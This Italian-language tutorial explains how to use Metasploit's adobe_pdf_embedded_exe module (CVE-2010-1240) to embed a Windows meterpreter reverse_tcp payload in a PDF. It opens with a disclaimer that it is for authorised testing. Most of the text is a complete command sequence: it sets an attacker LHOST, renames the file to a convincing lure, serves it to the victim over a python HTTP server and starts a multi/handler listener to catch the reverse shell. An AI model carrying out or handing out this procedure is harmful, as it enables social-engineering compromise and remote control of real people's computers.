
Strumento basato su Metasploit per l'incorporamento di backdoor in PDF che sfrutta CVE-2010-1240 per distribuire payload meterpreter tramite ingegneria sociale per test di penetrazione autorizzati.
⚠️ Solo a scopo didattico e per ricerche di sicurezza autorizzate
Adobe Reader e Acrobat 9.x precedenti a 9.3.3, e 8.x precedenti a 8.2.3 su Windows e Mac OS X, non limitano il contenuto di un campo di testo nella finestra di avviso di apertura file, rendendo più facile per aggressori remoti ingannare gli utenti inducendoli a eseguire un programma locale arbitrario specificato in un documento PDF, come dimostrato da un campo di testo che afferma che il pulsante Apri consentirà all'utente di leggere un messaggio crittografato.

Per prima cosa, esegui msfconsole
msfconsole
Quindi, imposta il payload per l'incorporamento nel pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
imposta l'opzione INFILENAME e fornisci il percorso diretto del file pdf originale
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
imposta il nome del nuovo file PDF malevolo creato con un nome più convincente impostando l'opzione FILENAME
set FILENAME laporan.pdf
Trova e incorpora il payload nel file PDF
set payload windows/meterpreter/reverse_tcp
Imposta l'opzione LHOST con l'IP dell'attaccante
set LHOST 172.16.10.10
Apri un nuovo terminale e naviga fino alla posizione del file PDF malevolo
cd .msf4/local/
Crea un server temporaneo in python
python -m http.server
Scarica il file PDF malevolo sulla macchina vittima
http://172.16.10.10:8000/certificate.pdf
Prima di eseguire il file PDF malevolo sulla macchina vittima, avvia il listener sul terminale precedente
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
Una volta che il file PDF malevolo viene eseguito sulla macchina vittima, ti darà una connessione alla macchina vittima